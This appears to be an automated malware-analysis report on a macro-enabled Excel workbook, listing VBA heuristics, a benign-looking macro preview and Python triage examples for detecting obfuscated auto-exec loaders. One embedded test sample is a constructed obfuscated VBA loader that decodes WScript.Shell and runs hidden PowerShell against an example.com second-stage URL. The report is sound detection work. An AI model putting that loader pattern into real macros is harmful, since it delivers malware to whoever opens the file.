Verdict: MALICIOUS
Risk score: 230

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file is an OOXML Excel workbook that carries a VBA project with a Workbook_Open handler, so its macro code runs as soon as the document is opened with macros enabled. The heuristics flag a Shell() call and an auto-exec routine that rebuilds strings through a custom decoder before handing them to a COM-instantiation or execution sink; that is the usual shape of a downloader that fetches and runs a second-stage payload while keeping CreateObject/Shell/URL indicators out of the macro source. The workbook also contains 10 hidden sheets, a low-severity supporting indicator (hidden sheets are commonly used to stage data or code) that is not evidence of malice on its own. Two checks are worth making before acting on the verdict: the 1,000-line preview of macros.bas below covers only the ThisWorkbook module, whose Workbook_Open handler saves application settings and calls Module31/Module32/Module33 routines with conventional line-numbered error logging, so the flagged Shell() call and string decoder sit outside the preview and should be confirmed in the full extracted source or in the p-code; and all five extracted URLs (one mathsisfun.com page and four XMP/RDF namespace URIs) were found in document text, not in macro code, so they are context rather than indicators.
Heuristics (7)

- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): the document contains a VBA project, so VBA macros are present.
- Shell() call in VBA (critical, OLE_VBA_SHELL): a Shell() call appears in the VBA code.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): an auto-exec routine reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Workbook_Open macro (high, OLE_VBA_WBOPEN): the workbook defines a Workbook_Open handler, which Excel runs automatically when the file is opened with macros enabled.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA (p-code) / cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, or ones whose source extraction failed, where no visible source is available. When the extracted source and the p-code disagree, the p-code is what an Office build matching the compiled version executes, so it is the one to trust.
- Hidden worksheet (hidden) (low, OOXML_HIDDEN_SHEET): the workbook contains 10 hidden sheet(s); hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL channel shows which part of the document (macro, JS, link annotation, document body, ...) reached each URL.
  - https://www.mathsisfun.com/median.html (in document text: OOXML body / shared strings)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/ (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text: OOXML body / shared strings)
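The OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_WBOPEN findings above describe a code shape rather than a string match. The following Python is an added example, not the analyzer's own code, that applies that shape to extracted VBA source: it finds auto-exec triggers and execution sinks, recognises the three decoder shapes the finding names (numeric Chr() arrays, a hex-pair-to-Chr loop, junk-token Replace), statically decodes the strings they build, and then checks the decoded strings for indicators the source itself never shows. Both VBA snippets are constructed for the example; the second mimics the ThisWorkbook preview below and does not fire. The regexes, the sink list and the example.com URL are assumptions, not signatures from the analyzer.

```python
import re

# Procedure names Office runs on its own (auto-exec triggers): no user click needed.
AUTOEXEC = re.compile(
    r"\b(Workbook_Open|Auto_Open|AutoOpen|Document_Open|Workbook_Activate)\b", re.I)
# Execution / COM-instantiation sinks that may still be visible in source.
SINKS = re.compile(
    r"\b(Shell|CreateObject|GetObject|ShellExecute|CallByName|URLDownloadToFile)\b", re.I)
# Indicators the loader shape keeps out of the source until its strings are decoded.
DECODED_IOC = re.compile(
    r"(WScript\.Shell|Scripting\.FileSystemObject|MSXML2\.|powershell|cmd\.exe"
    r"|rundll32|mshta|https?://\S+)", re.I)

# The three decoder shapes the finding names (assumed regexes, one per shape).
CHR_CHAIN = re.compile(r"(?:Chr\(\s*\d+\s*\)\s*&\s*){3,}Chr\(\s*\d+\s*\)", re.I)  # numeric char array
HEX_DECODER = re.compile(r'Val\(\s*"&H"\s*&\s*Mid\(', re.I)        # hex-pair -> Chr loop
HEX_LITERAL = re.compile(r'"([0-9A-Fa-f]{8,})"')                    # literals that loop consumes
REPLACE_JUNK = re.compile(
    r'Replace\(\s*"([^"]*)"\s*,\s*"([^"]+)"\s*,\s*""\s*\)', re.I)  # junk-token removal


def decode_chr_chains(src):
    """Shape 1: Chr(87) & Chr(83) & ... rebuilt into the string it produces."""
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
            for m in CHR_CHAIN.finditer(src)]


def decode_hex_literals(src):
    """Shape 2: long hex literals, decoded only when a hex->Chr loop exists to consume them."""
    if not HEX_DECODER.search(src):
        return []
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(src) if len(h) % 2 == 0]


def decode_replace_junk(src):
    """Shape 3: Replace("junk-laden literal", "junk", "") evaluated statically."""
    return [s.replace(junk, "") for s, junk in REPLACE_JUNK.findall(src)]


def triage_vba(src):
    """Apply the loader-shape heuristic to one module's VBA source."""
    decoded = {"chr_array": decode_chr_chains(src),
               "hex_decode": decode_hex_literals(src),
               "replace_junk": decode_replace_junk(src)}
    shapes = [name for name, hits in decoded.items() if hits]
    strings = [s for hits in decoded.values() for s in hits]
    hidden_iocs = sorted({m.group(0) for s in strings for m in DECODED_IOC.finditer(s)})
    autoexec = sorted({m.lower() for m in AUTOEXEC.findall(src)})
    sinks = sorted({m.lower() for m in SINKS.findall(src)})
    # Loader shape = auto-exec trigger + at least one decoder shape + somewhere for the
    # decoded strings to go (a sink in source, or an indicator that only exists after decoding).
    loader = bool(autoexec and shapes and (sinks or hidden_iocs))
    return {"autoexec": autoexec, "sinks": sinks, "decoder_shapes": shapes,
            "decoded_strings": strings, "hidden_iocs": hidden_iocs,
            "obfuscated_autoexec_loader": loader}


# Constructed sample 1: all three decoder shapes feeding CreateObject and a Run call.
LOADER_SAMPLE = '''
Private Sub Workbook_Open()
    Dim p As String, o As Object
    p = Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
    Set o = CreateObject(p)
    o.Run Dec("706F7765727368656C6C2E657865") & " -w hidden " & Replace("hqzttp://exqzample.com/sqztage2", "qz", "")
End Sub

Function Dec(h As String) As String
    Dim i As Long, r As String
    For i = 1 To Len(h) Step 2
        r = r & Chr(Val("&H" & Mid(h, i, 2)))
    Next i
    Dec = r
End Function
'''

# Constructed sample 2: auto-exec handler in the style of the ThisWorkbook preview, no decoder.
PLAIN_SAMPLE = '''
Private Sub Workbook_Open()
    On Error GoTo ErrorHandler
110 Application.Calculation = xlCalculationManual
140 Call Module32.RunInitialMacros
    Exit Sub
ErrorHandler:
150 Call Module33.LogEvent(Err, "ThisWorkbook.Workbook_Open", Erl)
End Sub
'''

if __name__ == "__main__":
    for name, sample in (("loader", LOADER_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(name, triage_vba(sample))
```

The point of the static decode step is the last line of the finding: the first sample never contains the strings "WScript.Shell", "powershell" or a URL, so a plain indicator grep over the source misses it, while the plain sample has the same Workbook_Open trigger and is correctly left alone because it has no decoder shape and no sink.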
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 168546 bytes | f8288c0a85c102df63ea42d7acf3e737814bddd37bac5574eba12b265654482e |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 663552 bytes | 635ae8acea6c84f21d88d617307f05891c8231c893ec132f8bf168b001333d92 |

Preview of macros.bas (first 1,000 lines of the extracted script; the copy shown here is cut off where marked):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' v6.0 - 25072018 - 1621IST
Dim CalculationSetting As Integer
Dim ScreenUpdating As Boolean
Dim DisplayStatusBar As Boolean
Dim EnableEvents As Boolean
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error GoTo ErrorHandler
Application.Calculation = xlCalculationAutomatic
'Call LogEventTest
' Restore Client Settings
10 'Application.Calculation = CalculationSetting
20 'Application.ScreenUpdating = ScreenUpdating
30 'Application.DisplayStatusBar = DisplayStatusBar
40 'Application.EnableEvents = EnableEvents
Exit Sub
ErrorHandler:
50 Call Module33.LogEvent(Err, "ThisWorkbook.Workbook_BeforeClose", Erl)
60 Call Module33.ErrorHandler
End Sub
Private Sub LogEventTest()
On Error GoTo ErrorHandler
10 Dim t As Integer
20 t = 7 / 0
ErrorHandler:
50 Call Module33.LogEvent(Err, "ThisWorkbook.TestLog", Erl)
End Sub
Private Sub Workbook_Open()
On Error GoTo ErrorHandler
' Store Client Settings
70 CalculationSetting = Application.Calculation
80 ScreenUpdating = Application.ScreenUpdating
90 DisplayStatusBar = Application.DisplayStatusBar
100 EnableEvents = Application.EnableEvents
'Sheet2.CommandButton1_Click
110 Application.Calculation = xlCalculationManual
111 Call Module31.FreezePane
' Sheet1.Visible = xlSheetHidden
' Sheet8.Visible = xlSheetHidden
120 If Sheet2.Cells(1, 30) = "1" Then
130 Call Module33.OptimizeCode_End_ExceptCalculation
End
End If
140 Call Module32.RunInitialMacros
Exit Sub
ErrorHandler:
150 Call Module33.LogEvent(Err, "ThisWorkbook.Workbook_Open", Erl)
160 Call Module33.ErrorHandler
End Sub
Sub FillSupplyLOSCB()
On Error GoTo ErrorHandler
Dim startTime As Date
170 startTime = Now()
180 If ThisWorkbook.sheetExists("Sheet9") And Range("Sheet3!A3") > "" Then
'Call FillComboFromSheet(Sheet9.CB_Supply_LOS, "listLOS1")
190 Call Module8.FillDropDownFromSheet(Sheet9, Sheet9.Shapes("dd_Supply_LOS"), "listLOS1", ThisWorkbook.Settings("SupplyLOS"))
' Dim val As String
' val = Sheet1.Cells(5, 1)
' If val > "" Then
' Sheet9.CB_Supply_LOS.Clear
' Sheet9.CB_Supply_LOS.List = Split(val, ",")
' Sheet9.CB_Supply_LOS.Text = Sheet9.CB_Supply_LOS.List(0)
' End If
End If
200 Call Module33.LogTime("FillSupplyLOSCB", startTime, Now())
Exit Sub
ErrorHandler:
210 Call Module33.LogEvent(Err, "ThisWorkbook.FillSupplyLOSCB", Erl)
220 Call Module33.ErrorHandler
End Sub
Sub FillOverviewLOSCB()
On Error GoTo ErrorHandler
Dim startTime As Date
230 startTime = Now()
240 If ThisWorkbook.sheetExists("Sheet4") And Range("Sheet3!A3") > "" Then
250 Call Module8.FillDropDownFromSheet(Sheet4, Sheet4.Shapes("dd_Overvw_LOS"), "listLOS1", ThisWorkbook.Settings("OverviewLOS"))
'Call FillComboFromSheet(Sheet4.cb_Overvw_LOS, "listLOS1")
' Dim val As String
' val = Sheet4.cb_Overvw_LOS.value
' If val = "" Then
' Sheet4.cb_Overvw_LOS.ListFillRange = ""
' Sheet4.cb_Overvw_LOS.ListFillRange = "ListLOS"
' Sheet4.cb_Overvw_LOS.Text = Sheet4.cb_Overvw_LOS.List(0)
' End If
Dim val2 As String
260 val2 = Sheet4.Cells(10, 1)
270 If val2 = "" Then
280
... (truncated)
```

The numeric labels (10, 20, 110, ...) are VBA line numbers; they are kept because the module's error handlers pass `Erl` to Module33.LogEvent, which reports the label of the line that raised the error.
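The container-level findings (a VBA project part, 10 hidden sheets, URLs in shared strings) come from the OOXML zip itself rather than from the macro source. As an added example that is not the analyzer's own code, the Python below builds a small constructed .xlsx in memory with the same features (an xl/vbaProject.bin part, one hidden and one veryHidden sheet, and shared strings holding one link plus two XMP/RDF namespace URIs) and triages it: it checks that xl/vbaProject.bin exists and starts with the OLE2/CFB signature, reads sheet visibility states from xl/workbook.xml, and pulls URLs out of xl/sharedStrings.xml, tagging schema-namespace URIs separately so they are not mistaken for links. The namespace-host allowlist and the stub vbaProject.bin contents are assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

MAIN_NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2/CFB signature a real vbaProject.bin starts with
URL_RE = re.compile(r'https?://[^\s"<>]+')
# Hosts whose URLs are XML/XMP schema identifiers rather than links (assumed allowlist).
NAMESPACE_HOSTS = {"www.w3.org", "ns.adobe.com", "schemas.openxmlformats.org",
                   "schemas.microsoft.com", "purl.org"}

# Constructed sample parts: one visible, one hidden and one veryHidden sheet.
WORKBOOK_XML = """<?xml version="1.0" encoding="UTF-8"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets>
    <sheet name="Overview" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Sheet3" sheetId="3" state="veryHidden" r:id="rId3"/>
  </sheets>
</workbook>"""

# Constructed shared strings: a real link, an RDF namespace, and an XMP namespace in a rich-text run.
SHARED_STRINGS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3" uniqueCount="3">
  <si><t>See https://www.mathsisfun.com/median.html for the definition</t></si>
  <si><t>http://www.w3.org/1999/02/22-rdf-syntax-ns#</t></si>
  <si><r><t>xmlns:xmp=</t></r><r><t>http://ns.adobe.com/xap/1.0/</t></r></si>
</sst>"""


def build_sample_xlsx() -> bytes:
    """Assemble the constructed parts into a minimal OOXML zip; no real workbook is needed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", WORKBOOK_XML)
        z.writestr("xl/sharedStrings.xml", SHARED_STRINGS_XML)
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        # Stub VBA project: only the CFB signature is meaningful here (assumed content).
        z.writestr("xl/vbaProject.bin", CFB_MAGIC + b"\x00" * 24)
    return buf.getvalue()


def classify_url(url: str) -> str:
    """Separate schema/namespace identifiers from URLs a user could actually follow."""
    host = urlparse(url).hostname or ""
    return "schema-namespace-uri" if host in NAMESPACE_HOSTS else "link"


def hidden_sheets(z: zipfile.ZipFile):
    """Sheets whose state attribute hides them from the tab bar (veryHidden also hides them from the UI)."""
    root = ET.fromstring(z.read("xl/workbook.xml"))
    return [(s.get("name"), s.get("state")) for s in root.iter(MAIN_NS + "sheet")
            if s.get("state") in ("hidden", "veryHidden")]


def shared_string_urls(z: zipfile.ZipFile):
    """URLs in cell text, including rich-text runs, with a channel-independent classification."""
    if "xl/sharedStrings.xml" not in z.namelist():
        return []
    root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    text = " ".join(t.text or "" for t in root.iter(MAIN_NS + "t"))
    return [(u, classify_url(u)) for u in URL_RE.findall(text)]


def triage_xlsx(data: bytes) -> dict:
    """Container-level checks mirroring OOXML_VBA, OOXML_HIDDEN_SHEET and EMBEDDED_URL."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        has_vba = "xl/vbaProject.bin" in z.namelist()
        return {
            "vba_project": has_vba,
            "vba_project_is_cfb": has_vba and z.read("xl/vbaProject.bin")[:8] == CFB_MAGIC,
            "hidden_sheets": hidden_sheets(z),
            "urls": shared_string_urls(z),
        }


if __name__ == "__main__":
    for key, value in triage_xlsx(build_sample_xlsx()).items():
        print(f"{key}: {value}")
```

On a real sample the next step after `vba_project_is_cfb` is to hand xl/vbaProject.bin to olevba, which is what produced macros.bas in the table above; the URL classification only says where a string came from and what it looks like, matching the report's note that an extracted URL is not a detection by itself.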